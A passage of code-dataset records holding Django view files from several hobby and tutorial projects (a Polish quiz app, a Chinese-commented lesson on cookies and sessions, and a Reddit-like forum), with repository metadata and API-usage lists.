thrs:\n t.join()\n\n # finally:\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "minerllabs/minerl", "sub_path": "tests/excluded/ai_crowd_specified_seed_test.py", "file_name": "ai_crowd_specified_seed_test.py", "file_ext": "py", "file_size_in_byte": 1665, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 587, "dataset": "github-code", "pt": "52", "api": [{"api_name": "subprocess.Popen", "line_number": 30, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 34, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 52, "usage_type": "attribute"}, {"api_name": "gym.make", "line_number": 57, "usage_type": "call"}, {"api_name": "Pyro4.util.getPyroTraceback", "line_number": 60, "usage_type": "call"}, {"api_name": "Pyro4.util", "line_number": 60, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 69, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "18664388660", "text": "# -*- coding: utf-8 -*-\n\nfrom django.shortcuts import render, redirect\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth import forms, logout # authenticate, login\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom pytania.models import Grupa, Kategoria, Obrazek, Pytanie\nfrom django.contrib.auth.models import Group\nfrom pytania.forms import UserChangePassEmailForm\nfrom pytania.forms import GroupForm, GrupaForm\nfrom django.http import HttpResponseRedirect\nfrom pytania.forms import PytanieForm, OdpowiedziFormSet\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\nfrom django.views.generic.list import ListView\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\n\n\ndef index(request):\n \"\"\"Strona główna\"\"\"\n formlog = forms.AuthenticationForm()\n context = {'user': request.user, 'formlog': formlog}\n return render(request, 'pytania/index.html', context)\n\n\n@login_required()\ndef change_password(request):\n if request.method == 'POST':\n form = UserChangePassEmailForm(request.user, request.POST)\n if form.is_valid():\n user = form.save()\n update_session_auth_hash(request, user) # Important!\n messages.success(request, \"Dane zaktualizowano!\")\n return redirect('/')\n else:\n messages.error(request, 'Proszę popraw błędy!')\n else:\n form = UserChangePassEmailForm(request.user)\n return render(request, 'password_change_form.html', {\n 'form': form\n })\n\n\n@login_required()\ndef my_profil(request):\n \"\"\"Edycja danych użytkownika\"\"\"\n\n from pytania.forms import UserUpdateForm\n from pytania.forms import UserGroupForm\n user_form = UserUpdateForm(instance=request.user)\n if request.method == 'POST':\n user_form = UserUpdateForm(data=request.POST, instance=request.user)\n if user_form.has_changed() and user_form.is_valid():\n user_form.save()\n messages.success(request, \"Dane zaktualizowano!\")\n else:\n messages.info(request, \"Dane są aktualne.\")\n\n # formlog = forms.AuthenticationForm()\n grupa_form = UserGroupForm()\n grupy = request.user.groups.all()\n context = {\n 'user_form': user_form,\n 'grupa_form': grupa_form,\n 'grupy': grupy\n }\n return render(request, 'pytania/profil.html', context)\n\n\ndef my_logout(request):\n \"\"\"Wylogowywanie użytkownika z systemu\"\"\"\n logout(request)\n messages.info(request, \"Zostałeś wylogowany!\")\n return redirect(reverse('pytania:index'))\n\n\n@login_required()\ndef my_grupy(request):\n \"\"\"Dodawanie do grupy / lista grup / usuwanie z grupy użytkownika\"\"\"\n\n from pytania.forms import UserUpdateForm\n from pytania.forms import UserGroupForm\n\n if request.method == 'POST':\n grupa_form = UserGroupForm(data=request.POST)\n if grupa_form.is_valid():\n try:\n grupa = Grupa.objects.get(\n token=grupa_form.cleaned_data.get('token'))\n if request.user.groups.filter(pk=grupa.grupa.id).count():\n messages.warning(\n request, 'Jesteś już w grupie %s!' % grupa.grupa)\n else:\n grupa.grupa.user_set.add(request.user)\n messages.success(\n request, \"Dodano Cię do grupy %s!\" % grupa.grupa)\n except Grupa.DoesNotExist:\n messages.error(request, 'Błędne hasło!')\n\n # usnięcie użytkownika z grup\n if request.POST.get('grupydel'):\n for g_id in request.POST.get('grupydel'):\n grupa = Grupa.objects.get(grupa=g_id)\n grupa.grupa.user_set.remove(request.user)\n messages.success(\n request, \"Usunięto Cię z grupy %s!\" % grupa.grupa)\n\n user_form = UserUpdateForm(instance=request.user)\n grupa_form = UserGroupForm()\n grupy = request.user.groups.all()\n context = {\n 'user_form': user_form,\n 'grupa_form': grupa_form,\n 'grupy': grupy\n }\n return render(request, 'pytania/profil.html', context)\n\n\n# def test_func(user):\n# \"\"\"Czy użytkowni jest w grupie Autorzy?\"\"\"\n# return user.groups.filter(name='Autorzy').exists()\n\n\n@login_required\n# @user_passes_test(test_func)\n# @transaction.atomic\ndef update_grupa(request, group_id=None):\n\n if not request.user.groups.filter(name='Autorzy').exists():\n messages.warning(\n request,\n \"Aby dodawać grupy, musisz należeć do grupy Autorzy\")\n return redirect('/grupy/')\n\n object_list = Grupa.objects.filter(autor=request.user)\n\n if (group_id):\n group = Group.objects.select_related('grupa').get(pk=group_id)\n else:\n group = Group()\n group.grupa = Grupa()\n\n if request.method == 'POST':\n group_form = GroupForm(request.POST, instance=group)\n grupa_form = GrupaForm(request.POST, instance=group.grupa)\n grupa_form.instance.autor = request.user\n if group_form.is_valid() and grupa_form.is_valid():\n group_form.instance.autor = request.user\n group_form.instance.token = grupa_form.instance.token\n group_form.save()\n # grupa_form.instance.grupa = obj\n # grupa_form.save()\n messages.success(request, ('Dodano grupę'))\n return redirect('pytania:grupa')\n else:\n messages.error(request, ('Popraw poniższe błędy.'))\n else:\n group_form = GroupForm(instance=group)\n grupa_form = GrupaForm(instance=group.grupa)\n\n return render(request, 'pytania/grupa_form.html', {\n 'object_list': object_list,\n 'group_form': group_form,\n 'grupa_form': grupa_form\n })\n\n\nclass GrupaDelete(LoginRequiredMixin, UserPassesTestMixin, DeleteView):\n model = Group\n template_name_suffix = '_delete'\n success_url = '/grupa'\n\n def test_func(self):\n \"\"\"Nadpisanie funkcji testującej uprawnienia użytkownika\"\"\"\n return self.request.user.groups.filter(name='Autorzy').exists()\n\n def get_login_url(self):\n if not self.request.user.is_authenticated():\n return super(GrupaDelete, self).get_login_url()\n else:\n self.redirect_field_name = None\n messages.warning(\n self.request,\n \"Aby usuwać grupy, musisz należeć do grupy Autorzy\")\n return '/grupy/'\n\n\nclass KategoriaCreate(LoginRequiredMixin, CreateView):\n # login_url = '/pytania/login/'\n model = Kategoria\n fields = ['nazwa']\n success_url = '/kategoria'\n\n def get_context_data(self, **kwargs):\n kwargs['object_list'] = Kategoria.objects.filter(\n autor=self.request.user)\n return super(KategoriaCreate, self).get_context_data(**kwargs)\n\n def form_valid(self, form):\n kategoria = form.save(commit=False)\n kategoria.autor = self.request.user\n kategoria.save()\n return super(KategoriaCreate, self).form_valid(form)\n\n\nclass KategoriaUpdate(LoginRequiredMixin, UpdateView):\n # login_url = '/pytania/login/'\n model = Kategoria\n fields = ['nazwa']\n success_url = '/kategoria'\n\n def get_context_data(self, **kwargs):\n kwargs['object_list'] = Kategoria.objects.filter(\n autor=self.request.user)\n return super(KategoriaUpdate, self).get_context_data(**kwargs)\n\n # def form_valid(self, form):\n # kategoria = form.save(commit=False)\n # kategoria.autor = self.request.user\n # kategoria.save()\n # return super(KategoriaUpdate, self).form_valid(form)\n\n\nclass KategoriaDelete(LoginRequiredMixin, DeleteView):\n model = Kategoria\n template_name_suffix = '_delete'\n success_url = '/kategoria'\n\n def form_valid(self, form):\n print(form.cleaned_data)\n return super(KategoriaDelete, self).form_valid(form)\n\n\ndef kategoriaDel(request):\n from django.http import JsonResponse\n data = {}\n if request.method == 'POST':\n kategoria_id = request.POST.get('kategoria-id')\n if kategoria_id:\n data['success'] = 'Kategorię usunięto!'\n else:\n data['error'] = 'To nie powinno się zdarzyć!'\n\n return JsonResponse(data)\n\n\nclass ObrazekCreate(LoginRequiredMixin, CreateView):\n model = Obrazek\n fields = ['obrazek', 'opis', 'kategoria']\n success_url = '/obrazek'\n\n def get_context_data(self, **kwargs):\n kwargs['object_list'] = Obrazek.objects.filter(\n autor=self.request.user)\n return super(ObrazekCreate, self).get_context_data(**kwargs)\n\n def form_valid(self, form):\n obj = form.save(commit=False)\n obj.autor = self.request.user\n obj.save()\n return super(ObrazekCreate, self).form_valid(form)\n\n\nclass ObrazekUpdate(LoginRequiredMixin, UpdateView):\n model = Obrazek\n fields = ['obrazek', 'opis', 'kategoria']\n success_url = '/obrazki'\n\n\nclass ObrazekDelete(LoginRequiredMixin, DeleteView):\n model = Obrazek\n fields = ['obrazek', 'opis', 'kategoria']\n success_url = '/obrazki'\n\n\nclass PytanieCreate(LoginRequiredMixin, CreateView):\n # login_url = '/pytania/login/'\n model = Pytanie\n form_class = PytanieForm\n success_url = '/pytanie'\n\n def get(self, request, *args, **kargs):\n self.object = None\n form_class = self.get_form_class()\n form = self.get_form(form_class)\n odpowiedzi = OdpowiedziFormSet()\n print(odpowiedzi)\n return self.render_to_response(\n self.get_context_data(form=form, odpowiedzi=odpowiedzi))\n\n def post(self, request, *args, **kwargs):\n self.object = None\n form_class = self.get_form_class()\n form = self.get_form(form_class)\n odpowiedzi = OdpowiedziFormSet(self.request.POST)\n if form.is_valid() and odpowiedzi.is_valid():\n return self.form_valid(form, odpowiedzi)\n else:\n return self.form_invalid(form, odpowiedzi)\n\n def form_valid(self, form, odpowiedzi):\n pytanie = form.save(commit=False)\n pytanie.autor = self.request.user\n pytanie.save()\n self.object = pytanie\n odpowiedzi.instance = self.object\n odpowiedzi.save()\n return HttpResponseRedirect(self.get_success_url())\n\n def form_invalid(self, form, odpowiedzi):\n return self.render_to_response(\n self.get_context_data(form=form, odpowiedzi=odpowiedzi)\n )\n\n\nclass PytaniaLista(LoginRequiredMixin, ListView):\n\n model = Pytanie\n\n def get_context_data(self, **kwargs):\n context = super(PytaniaLista, self).get_context_data(**kwargs)\n context['object_list'] = Pytanie.objects.filter(\n autor=self.request.user)\n return context\n\n\n@login_required(login_url='/login')\ndef pytania(request):\n from pytania.forms import PytanieForm, OdpowiedziFormSet\n\n form = PytanieForm()\n odpowiedzi_formset = OdpowiedziFormSet(instance=Pytanie())\n\n formlog = forms.AuthenticationForm()\n context = {'form': form,\n 'formlog': formlog,\n 'odpowiedzi': odpowiedzi_formset}\n return render(request, 'pytania/pytania.html', context)\n\n\n# from django.views.generic import ListView\n# class KategoriaListView(ListView):\n# context_object_name = \"kategorie\"\n# queryset = Kategoria.objects.filter(autor=request.user)\n# template_name = \"pytania/kategorie.html\"\n\n# def get_queryset(self):\n# return Kategoria.objects.filter(autor=self.request.user)\n", "repo_name": "xinulsw/testy3dj", "sub_path": "pytania/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 11648, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.contrib.auth.forms.AuthenticationForm", "line_number": 22, "usage_type": "call"}, {"api_name": "django.contrib.auth.forms", "line_number": 22, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 24, "usage_type": "call"}, {"api_name": "pytania.forms.UserChangePassEmailForm", "line_number": 30, "usage_type": "call"}, {"api_name": "django.contrib.auth.update_session_auth_hash", "line_number": 33, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 34, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 34, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 35, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 37, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 37, "usage_type": "name"}, {"api_name": "pytania.forms.UserChangePassEmailForm", "line_number": 39, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 40, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 27, "usage_type": "call"}, {"api_name": "pytania.forms.UserUpdateForm", "line_number": 51, "usage_type": "call"}, {"api_name": "pytania.forms.UserUpdateForm", "line_number": 53, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 56, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 56, "usage_type": "name"}, {"api_name": "django.contrib.messages.info", "line_number": 58, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 58, "usage_type": "name"}, {"api_name": "pytania.forms.UserGroupForm", "line_number": 61, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 68, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 45, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 73, "usage_type": "call"}, {"api_name": "django.contrib.messages.info", "line_number": 74, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 74, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 75, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 75, "usage_type": "call"}, {"api_name": "pytania.forms.UserGroupForm", "line_number": 86, "usage_type": "call"}, {"api_name": "pytania.models.Grupa.objects.get", "line_number": 89, "usage_type": "call"}, {"api_name": "pytania.models.Grupa.objects", "line_number": 89, "usage_type": "attribute"}, {"api_name": "pytania.models.Grupa", "line_number": 89, "usage_type": "name"}, {"api_name": "django.contrib.messages.warning", "line_number": 92, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 92, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 96, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 96, "usage_type": "name"}, {"api_name": "pytania.models.Grupa.DoesNotExist", "line_number": 98, "usage_type": "attribute"}, {"api_name": "pytania.models.Grupa", "line_number": 98, "usage_type": "name"}, {"api_name": "django.contrib.messages.error", "line_number": 99, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 99, "usage_type": "name"}, {"api_name": "pytania.models.Grupa.objects.get", "line_number": 104, "usage_type": "call"}, {"api_name": "pytania.models.Grupa.objects", "line_number": 104, "usage_type": "attribute"}, {"api_name": "pytania.models.Grupa", "line_number": 104, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 106, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 106, "usage_type": "name"}, {"api_name": "pytania.forms.UserUpdateForm", "line_number": 109, "usage_type": "call"}, {"api_name": "pytania.forms.UserGroupForm", "line_number": 110, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 117, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 78, "usage_type": "call"}, {"api_name": "django.contrib.messages.warning", "line_number": 131, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 131, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 134, "usage_type": "call"}, {"api_name": "pytania.models.Grupa.objects.filter", "line_number": 136, "usage_type": "call"}, {"api_name": "pytania.models.Grupa.objects", "line_number": 136, "usage_type": "attribute"}, {"api_name": "pytania.models.Grupa", "line_number": 136, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.Group.objects.select_related", "line_number": 139, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Group.objects", "line_number": 139, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Group", "line_number": 139, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.Group", "line_number": 141, "usage_type": "call"}, {"api_name": "pytania.models.Grupa", "line_number": 142, "usage_type": "call"}, {"api_name": "pytania.forms.GroupForm", "line_number": 145, "usage_type": "call"}, {"api_name": "pytania.forms.GrupaForm", "line_number": 146, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 154, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 154, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 155, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 157, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 157, "usage_type": "name"}, {"api_name": "pytania.forms.GroupForm", "line_number": 159, "usage_type": "call"}, {"api_name": "pytania.forms.GrupaForm", "line_number": 160, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 162, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 125, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 169, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.UserPassesTestMixin", "line_number": 169, "usage_type": "name"}, {"api_name": "django.views.generic.edit.DeleteView", "line_number": 169, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.Group", "line_number": 170, "usage_type": "name"}, {"api_name": "django.contrib.messages.warning", "line_number": 183, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 183, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 189, "usage_type": "name"}, {"api_name": "django.views.generic.edit.CreateView", "line_number": 189, "usage_type": "name"}, {"api_name": "pytania.models.Kategoria", "line_number": 191, "usage_type": "name"}, {"api_name": "pytania.models.Kategoria.objects.filter", "line_number": 196, "usage_type": "call"}, {"api_name": "pytania.models.Kategoria.objects", "line_number": 196, "usage_type": "attribute"}, {"api_name": "pytania.models.Kategoria", "line_number": 196, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 207, "usage_type": "name"}, {"api_name": "django.views.generic.edit.UpdateView", "line_number": 207, "usage_type": "name"}, {"api_name": "pytania.models.Kategoria", "line_number": 209, "usage_type": "name"}, {"api_name": "pytania.models.Kategoria.objects.filter", "line_number": 214, "usage_type": "call"}, {"api_name": "pytania.models.Kategoria.objects", "line_number": 214, "usage_type": "attribute"}, {"api_name": "pytania.models.Kategoria", "line_number": 214, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 225, "usage_type": "name"}, {"api_name": "django.views.generic.edit.DeleteView", "line_number": 225, "usage_type": "name"}, {"api_name": "pytania.models.Kategoria", "line_number": 226, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 245, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 248, "usage_type": "name"}, {"api_name": "django.views.generic.edit.CreateView", "line_number": 248, "usage_type": "name"}, {"api_name": "pytania.models.Obrazek", "line_number": 249, "usage_type": "name"}, {"api_name": "pytania.models.Obrazek.objects.filter", "line_number": 254, "usage_type": "call"}, {"api_name": "pytania.models.Obrazek.objects", "line_number": 254, "usage_type": "attribute"}, {"api_name": "pytania.models.Obrazek", "line_number": 254, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 265, "usage_type": "name"}, {"api_name": "django.views.generic.edit.UpdateView", "line_number": 265, "usage_type": "name"}, {"api_name": "pytania.models.Obrazek", "line_number": 266, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 271, "usage_type": "name"}, {"api_name": "django.views.generic.edit.DeleteView", "line_number": 271, "usage_type": "name"}, {"api_name": "pytania.models.Obrazek", "line_number": 272, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 277, "usage_type": "name"}, {"api_name": "django.views.generic.edit.CreateView", "line_number": 277, "usage_type": "name"}, {"api_name": "pytania.models.Pytanie", "line_number": 279, "usage_type": "name"}, {"api_name": "pytania.forms.PytanieForm", "line_number": 280, "usage_type": "name"}, {"api_name": "pytania.forms.OdpowiedziFormSet", "line_number": 287, "usage_type": "call"}, {"api_name": "pytania.forms.OdpowiedziFormSet", "line_number": 296, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 309, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 317, "usage_type": "name"}, {"api_name": "django.views.generic.list.ListView", "line_number": 317, "usage_type": "name"}, {"api_name": "pytania.models.Pytanie", "line_number": 319, "usage_type": "name"}, {"api_name": "pytania.models.Pytanie.objects.filter", "line_number": 323, "usage_type": "call"}, {"api_name": "pytania.models.Pytanie.objects", "line_number": 323, "usage_type": "attribute"}, {"api_name": "pytania.models.Pytanie", "line_number": 323, "usage_type": "name"}, {"api_name": "pytania.forms.PytanieForm", "line_number": 332, "usage_type": "call"}, {"api_name": "pytania.forms.OdpowiedziFormSet", "line_number": 333, "usage_type": "call"}, {"api_name": "pytania.models.Pytanie", "line_number": 333, "usage_type": "call"}, {"api_name": "django.contrib.auth.forms.AuthenticationForm", "line_number": 335, "usage_type": "call"}, {"api_name": "django.contrib.auth.forms", "line_number": 335, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 339, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 328, "usage_type": "call"}]} +{"seq_id": "74818201123", "text": "from django.http import HttpResponse\nimport json\nfrom django.shortcuts import render, redirect\n\n\ndef index(request):\n pass\n\n\ndef Cookie(request):\n response = HttpResponse('ok')\n response.set_cookie('xuxu1','python1')\n response.set_cookie(\"xuxu2\",'python2')\n # 字典的方式获取cookie 获取不到数据会报错\n # cookie1 = request.COOKIES['xuxu1']\n # get 方式获取不到数据会返回None\n cookie1 = request.COOKIES.get('xuxu')\n # request.COOKIE返回的为字典类型\n response.delete_cookie(\"xuxu1\")\n print(cookie1)\n return response\n\n# Create your views here.\ndef goods(request,cat_id,goods_id):\n\n # print(cat_id,\"------\",goods_id)\n # return HttpResponse({\"cat_id\",cat_id,\"id\",goods_id})\n query_params=request.GET\n print(query_params)\n print(query_params.get(\"order\"))\n print(query_params.getlist(\"order\"))\n # <QueryDict: {'order':[\"readcount\"]}>\n # QueryDict 具有字典的特性\n # 还具有 一键多值\n # <QueryDict: {'order':['readcount','commentcount'],'page':['1']}>\n\n\n\n return HttpResponse(\"骑个饭店\")\n\ndef content(request):\n dict_j = request.body\n print(type(dict_j)) # bite类型需要转换成字符串\n # print(dict_j)\n dict_str = dict_j.decode() # 字符串类型\n # print(dict_str)\n print(type(dict_str))\n # dict_json = eval(dict_str)\n # print(dict_json)\n dict_json = json.loads(dict_str) # 使用json模块进行解码\n print(dict_json)\n print(type(dict_json))\n # print(dict_json['name'])\n\n ############请求头##############\n # print(request.META) # 获取请求头给的字典类型\n # print(type(request.META))\n # <class 'dict'>\n return HttpResponse(\"ok\")\n\ndef method(request):\n print(request.method) # 返回请求的方式\n return HttpResponse('method')\n\nfrom django.http import HttpResponse,JsonResponse\ndef response(request):\n # response = HttpResponse(\"res\",status=200)\n #\n # response['name'] = 'xuxuxuxu'\n #\n # return response\n # JSON --> dict\n # dict --> JSON\n\n info = {\n 'name':'xuxuuxu',\n 'address':'shunyi'\n }\n girl_friends=[\n {\n 'name':'rose',\n 'address':'shunyi'\n },\n {\n 'name':'jack',\n 'adress':'changping'\n }\n ]\n # data 返回的响应数据 一般是字典类型\n \"\"\"\n safe = Turn 是表示 我们的data是字典类型\n JsonResponse 可以把字典转换为json\n \n 现在给了一个非字典数据,出了问题 我们自己负责\n \"\"\"\n # response = JsonResponse(data=info) # 安全检测机制,data不是字典要把safe变为False\n# # # response = JsonResponse(data=girl_friends,safe=False)\n# # response['name'] = info['name']\n# # response['address'] = info['address']\n# # return response\n\n # redirect 重定向,跳到指定页面\n\n return redirect('http://www.baidu.com')\n\n # 等同于上面 JsonResponse(data=数据,safe=)\n # 没有安全机制\n # data = json.dumps(girl_friends)\n # response = HttpResponse(data)\n # return response\n\n # 1xx\n # 2xx 200 成功\n # 3xx\n # 4xx 请求有问题\n # 404 找不到页面 路由问题\n # 403 禁止访问 权限问题\n # 5xx\n # HTTP status code must be an integer from 100 to 599\n\n\n#####################################\n\n\"\"\"\n查询字符串\nhttp://ip:port/path/path/?key=value&key1=value1\n\n\nurl 以?为分割分为2部分\n? 前边为 请求路径\n? 后边为 查询字符串 查询字符串 类似于字典 key=value 多个数据采用&拼接\n\"\"\"\n#########################################################\n# session 是保存在服务器端--数据相对安全\n# session需要依赖于cookie\n\n\"\"\"\n第一次请求http://127.0.0.1:8000/set_session/?uersname=xuxuxu,\n我们在服务端设置session信息\n服务器同时会生成一个sessionid的cookie信息\n浏览器接收到这个信息之后,会把cookie数据保存起来\n\n第二次及其之后的请求 都会携带这个sessionid,服务器会验证这个sessionid,\n验证没问题会读取相关数据,实现业务逻辑\n\n\"\"\"\n\ndef set_session(request):\n # 1, 模拟获取用户信息\n username = request.GET.get(\"username\")\n\n # 2, 设置session信息\n # 假如 我们通过模型查询 查询到了用户的信息\n user_id=3\n print(username)\n\n request.session[\"user_id\"] = user_id\n request.session[\"user_name\"]=username\n\n # clear 删除session里的数据,但是key有保留\n # request.session.clear()\n # flush是删除所有数据,包括key\n # request.session.flush()\n\n # request.session.set_expiry(3600) # 已秒为单位,默认值为两周\n return HttpResponse('set_session')\n\ndef get_session(request):\n # 字典的查询方式获取数据,没有数据是会报错,get没有数据是会返回None\n # user_id = request.session[\"user_id\"]\n # user_name = request.session[\"user_name\"]\n user_id = request.session.get(\"user_id\")\n user_name = request.session.get(\"user_name\")\n user_time = request.session.get_expiry_date()\n content = \"{},{},{}\".format(user_id,user_name,user_time)\n\n return HttpResponse(content)\n\n####################################################\n# 类视图\n\ndef login(request):\n print(request.method)\n if request.method == 'GET':\n return HttpResponse(f'{request.method}逻辑')\n\n else:\n return HttpResponse(f'{request.method}逻辑')\n\n\n# 类视图的定义\n\"\"\"\nclass 类视图名字(view):\n def get(self,request):\n return HttpResponse(\"xxxx\")\n \n def http_method_lower(self,request):\n return HttpResponse(\"xxxx\")\n \n1 . 继承自view\n2 . 类视图中的方法 是采用 http方法小写来区分不同的请求方式\n\"\"\"\nfrom django.views import View\n\nclass LoginView(View):\n\n def post(self,request):\n return HttpResponse(\"post get get\")\n\n\n def get(self,request):\n return redirect('login/')\n\n\n\n", "repo_name": "xu678/Djiango", "sub_path": "book_django02/book/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 5961, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.http.HttpResponse", "line_number": 11, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 39, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 50, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 59, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 63, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 104, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 166, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 177, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 185, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 188, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 205, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 208, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 212, "usage_type": "call"}]} +{"seq_id": "20358830510", "text": "from django.shortcuts import render,get_object_or_404,redirect\nfrom django.utils import timezone\nfrom django.db.models import Count\nfrom django.http import HttpResponse,JsonResponse,Http404\nfrom django.forms.models import model_to_dict\nfrom django.template import TemplateDoesNotExist\nfrom django.contrib.auth import authenticate,login,logout\n\nfrom .models import Post,Comment\nfrom .forms import CommentForm,UserForm,UserProfileForm,PostForm\n\n# Create your views here.\ndef main_page(request):\n posts = Post.objects.annotate(comment_counts = Count('post_comments')).order_by('published_date') \n return render(request, 'sub/main_page.html', {'posts':posts})\n\ndef main_page_news(request):\n posts = Post.objects.annotate(comment_counts = Count('post_comments')).order_by('-published_date') \n return render(request, 'sub/main_page.html', {'posts':posts, 'basehtml':'sub/base_ajax.html'})\n\ndef main_page_tops(request):\n posts = Post.objects.annotate(comment_counts = Count('post_comments')).order_by('-points') \n return render(request, 'sub/main_page.html', {'posts':posts, 'basehtml':'sub/base_ajax.html'})\n\ndef main_page_hots(request):\n posts = Post.objects.annotate(comment_counts = Count('post_comments')).order_by('-comment_counts') \n return render(request, 'sub/main_page.html', {'posts':posts, 'basehtml':'sub/base_ajax.html'})\n\ndef comments_page(request, pk, slug):\n post = get_object_or_404(Post, pk=pk)\n comment_count = post.post_comments.count()\n comments = post.post_comments.prefetch_related('reply_comments').filter(parent_comment__isnull=True).order_by('-published_date')\n return render(request, 'sub/comments_page.html', {'post':post,'comments':comments, 'comment_count':comment_count})\n\ndef make_post_page(request):\n return render(request, 'sub/make_post_page.html')\n\ndef login_view(request):\n logged=False;\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password')\n user = authenticate(username=username, password=password)\n if user is not None:\n print(\"yep1\")\n login(request, user)\n logged=True\n \n return HttpResponse(logged)\n\ndef logout_view(request):\n if request.method == 'POST':\n logout(request)\n return HttpResponse(\"logout.\")\n else:\n return Http404\n\ndef register(request):\n registered = False\n if request.method == 'POST':\n user_form = UserForm(data=request.POST)\n profile_form = UserProfileForm(data=request.POST)\n print(request.POST);\n print(user_form.is_valid());\n if user_form.is_valid() and profile_form.is_valid():\n user = user_form.save()\n \n user.set_password(user.password) #hashing\n user.save()\n\n profile = profile_form.save(commit=False)\n profile.user = user\n \n profile.save()\n registered = True\n login(request,user)\n \n return HttpResponse(registered)\n\ndef get_template(request, template_name):\n try:\n return render(request, 'sub/kids/'+template_name+'.html')\n except TemplateDoesNotExist:\n return Http404\n\ndef make_post(request):\n if request.method == 'POST':\n post_form = PostForm(data=request.POST)\n if post_form.is_valid():\n post = post_form.save(commit=False)\n post.user = request.user\n post.save_it()\n return redirect('comments_page', pk=post.pk, slug=post.slug)\n\n return render(request, 'sub/make_post_page.html')\n\ndef make_comment(request): \n if request.method == 'POST':\n text = request.POST.get('text')\n parentpost_id = 